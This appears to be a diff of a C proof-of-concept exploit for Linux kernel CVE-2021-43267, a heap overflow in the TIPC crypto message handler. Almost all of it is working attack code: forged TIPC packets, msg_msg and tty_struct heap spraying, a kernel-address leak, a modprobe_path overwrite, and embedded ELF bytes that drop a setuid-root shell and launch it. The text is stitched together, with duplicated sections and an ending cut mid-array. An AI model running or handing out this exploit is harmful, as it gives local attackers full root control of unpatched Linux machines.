uint32_t w0, w1, w2, w3, w4, w5; - uint8_t pkt[24]; - w0 = 0; - w0 |= hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_msg_size(24); - w0 |= hdr_user(LINK_CONFIG); - w0 |= hdr_nonseq(1); - w1 = 0; - w2 = 0; - w3 = NODE_ID; - w4 = 0x1267; - w5 = hdr_media_id(MEDIA_TYPE_UDP); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_a(uint32_t ip) { - uint8_t pkt[56]; - uint32_t *body = (uint32_t*)(pkt + 
24); - uint32_t w0, w1, w2, w3, w4, w5; - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(56); - w1 = hdr_msg_type(RESET_MSG); - w2 = hdr_link_level_seq(0x8000); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; - body[pos++] = be32(3500 << 16); - memcpy(body + 4, "UDP1", 4); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_b(uint32_t ip) { - uint8_t pkt[44]; - uint32_t w0, w1, w2, w3, w4, w5; - uint32_t *body = (uint32_t*)(pkt + 24); - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(44); - w1 = hdr_msg_type(STATE_MSG); - w2 = hdr_link_level_seq(1); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; // timestamp - body[pos++] = 0; // max pkt/link tolerance - body[pos++] = 0; // bearer instance - tipc_send(pkt, sizeof(pkt)); -} - -int tipc_link_setup(char *host) { - if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { - perror("socket"); - return -1; - } - - memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); - g_sockaddr.sin_family = AF_INET; - g_sockaddr.sin_port = htons(TIPC_UDP_PORT); - - if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { - perror("inet_aton"); - return -1; - } - - tipc_discover(); - tipc_link_state_a(be32(inet_addr(host))); - tipc_link_state_b(be32(inet_addr(host))); - - return 0; -} - -void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { - uint8_t pkt[0x1000]; - uint32_t w0, w1, w2, w3, w4, w5; - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_user(MSG_CRYPTO); - w0 |= 
hdr_msg_size(24 + 36 + KEY_SIZE); - w1 = 0; - w2 = seqno; - w3 = NODE_ID; - w4 = 0; - w5 = 0; - - memset(pkt, 0, sizeof(pkt)); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - memcpy(pkt+24, "HAXX", 4); - *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); - memset(pkt+24+36, 'C', KEY_SIZE); - memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); - memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); - tipc_send(pkt, sizeof(pkt)); -} - -int setup_modprobe_hax() { - // small ELF file matroshka doll that does; - // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); - // write(fd, elfcode, elfcode_len) - // chmod("/tmp/sh", 04755) - // close(fd); - // exit(0); - // - // the dropped ELF simply does: - // setuid(0); - // setgid(0); - // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); - unsigned char elfcode[] = { - 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, - 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, - 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, - 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, - 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, - 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 
0x09, 0x00, 0x00, - 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, - 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, - 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, - 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, - 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, - 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, - 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, - 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 - }; - - FILE *fp; - - fp = fopen("/tmp/benign", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - fp = fopen("/tmp/hax", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - if (chmod("/tmp/benign", 0777) < 0) { - perror("chmod"); - return -1; - } - - if (chmod("/tmp/hax", 0777) < 0) { - perror("chmod"); - return -1; - } - - return 0; -} - -int main(int argc, char *argv[]) { - uint64_t pty_ops = 0; - uint64_t 
mybuf = 0; - uint64_t kernel_base = 0; - - uint8_t fake_tty[0x20]; - uint8_t peekbuf[0x2000]; - - int peek_cnt = 1; - int seqno=0; - - int tty_fds[SPRAY_TTY_CNT]; - int queue_id[MSG_COUNT]; - int queue_id_final = 0; - - struct message_t dummy; - dummy.type = MTYPE; - memset(dummy.body, 0x58, BODY_SIZE); - - fprintf(stdout, - "\n" - " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" - " -- by blasty --\n\n" - ); - - if (argc != 2) { - usage(argv[0]); - return -1; - } - - info("enabling tipc udp media"); - if (netlink_enable_tipc_udp(argv[1]) < 0) { - fatal("failed to enable tipc udp media"); - } - - info("establish tipc link"); - if (tipc_link_setup(argv[1]) < 0) { - fatal("failed to establish tipc link"); - } - - info("installing helpers"); - if (setup_modprobe_hax() < 0) { - fatal("failed to setup helpers"); - } - - info("create messages queues"); - if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue"); - } - - for(int i = 0; i < MSG_COUNT; i++) { - if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue %d", i); - } - } - - info("spray messages"); - for(int i = 0; i < MSG_COUNT; i++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message in queue %d", i); - } - } - - info("poking holes"); - for(int i = 0; i < MSG_COUNT; i += 2) { - if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to peek message in queue %d", i); - } - } - - info("tipc bug trigger"); - - uint64_t hacked_msg[4]={ - 0, // m_list.prev - 0, // m_list.next - MTYPE, // m_type - 0x2000, // m_ts - }; - - tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); - - info("spraying tty_struct\n"); - for(int i = 0; i < SPRAY_TTY_CNT; i++) { - if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to spray tty_struct %d/%d", i, 
MSG_COUNT); - } - } - - for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { - int r = msgrcv( - queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT - ); - - if (r < 0 || r == BODY_SIZE) { - continue; - } - - info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt); - - for(int j = 0; j < r; j += 4) { - if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { - continue; - } - - info("found tty_struct at offset 0x%x", j); - pty_ops = read64(peekbuf + j + 0x18); - mybuf = read64(peekbuf + j + 0x40) - 0x408; - - info_value64("pty_ops", pty_ops); - info_value64("our buffer", mybuf); - - memcpy(fake_tty, peekbuf + j, 0x20); - write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); - - // did we hit a master of slave ops ptr? - switch(pty_ops & 0xfff) { - case PTM_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTM_UNIX98_OPS; - break; - - case PTS_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTS_UNIX98_OPS; - break; - - default: - fatal("this should never happen tbh"); - break; - } - - info_value64("kernel base", kernel_base); - break; - } - - if (pty_ops != 0) { - break; - } else { - info("too bad, tty_struct didnt follow corrupted msg_msg."); - } - } - - if (pty_ops == 0) { - for(int i =0; i < SPRAY_TTY_CNT; i++) { - close(tty_fds[i]); - } - - fatal("infoleak failed. 
try again?"); - } - - info_value64("modprobe_path", kernel_base + MODPROBE_PATH); - - dummy.type = MTYPE; - for(int i = 0; i < BODY_SIZE; i+=8) { - write64(dummy.body + i, kernel_base + GADGET_RET); - } - write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); - - info("spray fake pty ops vtable"); - for(int i = 0; i < MSG_COUNT; i++) { - for(int j = 0; j < 8; j++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message %d", i); - } - } - } - - int hacked = 0; - - dummy.type = MTYPE; - for(int try = 0; try < TRIES_MAX; try++) { - info("attempting to corrupt tty_struct (try %d)", try); - - if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message"); - } - - if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to alloc tty_struct"); - } - - if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to receive message"); - } - - tipc_trigger(fake_tty, 0x20, ++seqno); - - int r = 0; - r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); - if (r == 0) { - info("maybe I have some good news.."); - r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); - hacked = 1; - break; - } else { - close(tty_fds[0]); - } - } - - if (!hacked) { - fatal("hacking computer failed."); - } - - info("triggering modprobe\n"); - system("/tmp/benign"); - sleep(1); - - info("popping shell\n"); - system("/tmp/sh"); - - for(int j = 0; j < SPRAY_TTY_CNT; j++) { - close(tty_fds[j]); - } - - return 0; +/* + * Local PoC exploit for CVE-2021-43267 [1] + * + * I want to see someone make a remote exploit for this. + * + * Only really tested on my local copy of 5.15. But given that you need the + * TIPC module loaded it is unlikely scriptkiddies will have a use for this. + * + * Exploit is a bit CTF quality. Feel free to send me revised copies. + * + * Enjoy! 
+ * + * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- + * allows-arbitrary-code-execution/ + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// these are offsets for my kernel, not yours +#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str +#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` +#define MODPROBE_PATH 0x16500E0 // has symbol +#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 +#define GADGET_RET 0x2c51fa // c3 + +// good numbers +#define KEY_SIZE 956 +#define MSG_COUNT 2048 +#define BODY_SIZE 976 +#define SMASH_SIZE 32 +#define TRIES_MAX 8 +#define NEXT_OFFSET 0x8000 + +// some constants +#define NODE_ID 0x11223344 +#define MTYPE 0xAB /* Ac1db34v3rz */ +#define SPRAY_TTY_CNT 0x40 +#define TTY_MAGIC 0x5401 +#define TIPC_UDP_PORT 6118 +#define MSG_COPY 040000 + +// TIPC crap +#define TIPC_VERSION 2 + +// user messages +#define LINK_PROTOCOL 7 +#define LINK_CONFIG 13 + +// message types +#define STATE_MSG 0 +#define RESET_MSG 1 +#define ACTIVATE_MSG 2 +#define MSG_CRYPTO 14 + +// media types +#define MEDIA_TYPE_UDP 3 + +// w0 +#define hdr_msg_size(v) ((v) & 0x1ffff) +#define hdr_size(v) ((v & 0xf) << 21) +#define hdr_user(v) ((v & 0xf) << 25) +#define hdr_nonseq(v) ((v & 1) << 20) +#define hdr_version(v) ((v & 7) << 29) + +// w1 +#define hdr_msg_type(v) ((v & 7) << 29) + +// w2 +#define hdr_link_level_seq(v) (v & 0xffff) + +// w4 +#define hdr_next_send_pkt(v) (v & 0xffff) + +// w5 +#define hdr_media_id(v) (v & 0xff) +#define hdr_session_number(v) ((v & 0xffff) << 16) + +// prototypes +struct message_t { + long type; + uint8_t body[BODY_SIZE]; +}; + +// globals +int g_sockfd = 0; +struct sockaddr_in g_sockaddr; + +// utility +#define info(fmt, args...) report('$', false, fmt, ## args) +#define infov(fmt, args...) 
report('~', false, fmt, ## args) +#define maybe(fmt, args...) report('?', false, fmt, ## args) +#define fatal(fmt, args...) report('!', true, fmt, ## args) +#define info_value64(name, value) infov("%-24s: %016lx", name, value) + +void report(char indicator, bool error, const char *fmt, ...) { + FILE *stream = (error) ? stderr : stdout; + va_list a; + va_start(a, fmt); + fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); + vfprintf(stream, fmt, a); + fprintf(stream, "\n"); + va_end(a); + + if (error) { + exit(-1); // all errors are fatal + } +} + +void usage(char *prog) { + printf("usage: %s \n\n", prog); +} + +static inline void write64(uint8_t *p, uint64_t v) { + *(uint64_t*)(p) = v; +} + +static inline uint64_t read64(uint8_t *p) { + return *(uint64_t*)(p); +} + +#define be32 htonl + +// netlink +int netlink_send( + uint16_t type, uint16_t flags, uint32_t seq, + uint8_t* pkt, size_t pkt_len, + uint8_t **reply_buf, size_t *reply_sz +) { + int sock_fd; + struct sockaddr_nl sa; + memset(&sa, 0, sizeof(struct sockaddr_nl)); + sa.nl_family = AF_NETLINK; + + size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; + uint8_t *pkt_full = malloc(pkt_full_len); + memset(pkt_full, 0, pkt_full_len); + memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); + + struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); + netlink_hdr->nlmsg_len = pkt_full_len; + netlink_hdr->nlmsg_type = type; + netlink_hdr->nlmsg_flags = flags; + netlink_hdr->nlmsg_seq = seq; + netlink_hdr->nlmsg_pid = getpid(); + + if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { + perror("socket"); + return -1; + } + + if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) { + perror("bind"); + return -1; + } + + ssize_t r = sendto( + sock_fd, pkt_full, pkt_full_len, 0, + (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) + ); + + if (r < 0) { + perror("sendto"); + return -1; + } + + free(pkt_full); + + if (reply_buf != NULL) { + struct msghdr m; + memset(&m, 0, 
sizeof(struct msghdr)); + m.msg_iovlen = 1; + m.msg_iov = malloc(sizeof(struct iovec)); + m.msg_iov->iov_base = malloc(0x1000); + m.msg_iov->iov_len = 0x1000; + + size_t nread; + + if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { + goto error; + } + + if (m.msg_iovlen != 1) { + goto error; + } + + *reply_sz = nread; + *reply_buf = malloc(*reply_sz); + memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); + free(m.msg_iov->iov_base); + } + + close(sock_fd); + return 0; + +error: + close(sock_fd); + return -1; +} + +int netlink_enable_tipc_udp(char *str_ip_address) { + uint8_t pkt_ctrl[]={ + 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, + 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, + 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 + }; + + uint8_t *nl_reply; + size_t nl_reply_len = 0; + uint32_t ip_addr; + uint32_t seq; + int r; + + seq = time(NULL); + + ip_addr = inet_addr(str_ip_address); + if (ip_addr == INADDR_NONE) { + fatal("invalid ip address given"); + } + + r = netlink_send( + NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len + ); + + if(r < 0) { + fatal("failed to send netlink control message."); + } + + if (nl_reply_len == 0) { + fatal("did not get netlink control message reply."); + } + + if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { + fatal("tipc support not available."); + } + + uint16_t nlmsg_type = 0; + off_t pos = 0x14; + + while(pos < nl_reply_len - 4) { + struct nlattr *attr = (struct nlattr*)(nl_reply + pos); + if (attr->nla_type == 1) { + nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); + break; + } + pos += attr->nla_len; + if ((attr->nla_len % 4) != 0) { + pos += 4 - (attr->nla_len % 4); + } + } + + if (nlmsg_type == 0) { + fatal("could not find tipc netlink message type."); + } + + uint8_t pkt_tipc_enable_udp[]={ + 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, + 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, + 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, + 0x2c, 0x00, 0x04, 0x80, 
0x14, 0x00, 0x01, 0x00, + 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, + 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 + }; + + *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; + + r = netlink_send( + nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, + pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL + ); + + if (r < 0) { + fatal("failed to send netlink tipc udp enable message."); + } + + // the right way is to read back a netlink reply and check if this worked.. + // I chose to go with the scientifically proven method of big chillin' + sleep(2); + + return 0; +} + +// tipc packet routines +void gen_tipc_hdr( + uint8_t *o, + uint32_t w0, uint32_t w1, uint32_t w2, + uint32_t w3, uint32_t w4, uint32_t w5 +) { + uint32_t* o32 = (uint32_t*)o; + o32[0] = be32(w0); + o32[1] = be32(w1); + o32[2] = be32(w2); + o32[3] = be32(w3); + o32[4] = be32(w4); + o32[5] = be32(w5); +} + +ssize_t tipc_send(uint8_t *buf, size_t sz) { + return sendto( + g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) + ); +} + +void tipc_discover() { + uint32_t w0, w1, w2, w3, w4, w5; + uint8_t pkt[24]; + w0 = 0; + w0 |= hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_msg_size(24); + w0 |= hdr_user(LINK_CONFIG); + w0 |= hdr_nonseq(1); + w1 = 0; + w2 = 0; + w3 = NODE_ID; + w4 = 0x1267; + w5 = hdr_media_id(MEDIA_TYPE_UDP); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_a(uint32_t ip) { + uint8_t pkt[56]; + uint32_t *body = (uint32_t*)(pkt + 24); + uint32_t w0, w1, w2, w3, w4, w5; + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(56); + w1 = hdr_msg_type(RESET_MSG); + w2 = hdr_link_level_seq(0x8000); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = 
hdr_session_number(50388); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; + body[pos++] = be32(3500 << 16); + memcpy(body + 4, "UDP1", 4); + tipc_send(pkt, sizeof(pkt)); +} + +void tipc_link_state_b(uint32_t ip) { + uint8_t pkt[44]; + uint32_t w0, w1, w2, w3, w4, w5; + uint32_t *body = (uint32_t*)(pkt + 24); + + memset(pkt, 0, sizeof(pkt)); + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(10); + w0 |= hdr_user(LINK_PROTOCOL); + w0 |= hdr_msg_size(44); + w1 = hdr_msg_type(STATE_MSG); + w2 = hdr_link_level_seq(1); + w3 = NODE_ID; + w4 = hdr_next_send_pkt(1); + w5 = hdr_session_number(50388); + + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + int pos = 0; + body[pos++] = be32(NODE_ID); + body[pos++] = be32(ip); + body[pos++] = 0; // timestamp + body[pos++] = 0; // max pkt/link tolerance + body[pos++] = 0; // bearer instance + tipc_send(pkt, sizeof(pkt)); +} + +int tipc_link_setup(char *host) { + if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + perror("socket"); + return -1; + } + + memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); + g_sockaddr.sin_family = AF_INET; + g_sockaddr.sin_port = htons(TIPC_UDP_PORT); + + if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { + perror("inet_aton"); + return -1; + } + + tipc_discover(); + tipc_link_state_a(be32(inet_addr(host))); + tipc_link_state_b(be32(inet_addr(host))); + + return 0; +} + +void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { + uint8_t pkt[0x1000]; + uint32_t w0, w1, w2, w3, w4, w5; + + w0 = hdr_version(TIPC_VERSION); + w0 |= hdr_size(6); + w0 |= hdr_user(MSG_CRYPTO); + w0 |= hdr_msg_size(24 + 36 + KEY_SIZE); + w1 = 0; + w2 = seqno; + w3 = NODE_ID; + w4 = 0; + w5 = 0; + + memset(pkt, 0, sizeof(pkt)); + gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); + + memcpy(pkt+24, "HAXX", 4); + *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); + memset(pkt+24+36, 'C', KEY_SIZE); + 
memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); + memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); + tipc_send(pkt, sizeof(pkt)); +} + +int setup_modprobe_hax() { + // small ELF file matroshka doll that does; + // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); + // write(fd, elfcode, elfcode_len) + // chmod("/tmp/sh", 04755) + // close(fd); + // exit(0); + // + // the dropped ELF simply does: + // setuid(0); + // setgid(0); + // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); + unsigned char elfcode[] = { + 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, + 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, + 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, + 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, + 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, + 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, + 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, + 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, + 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 
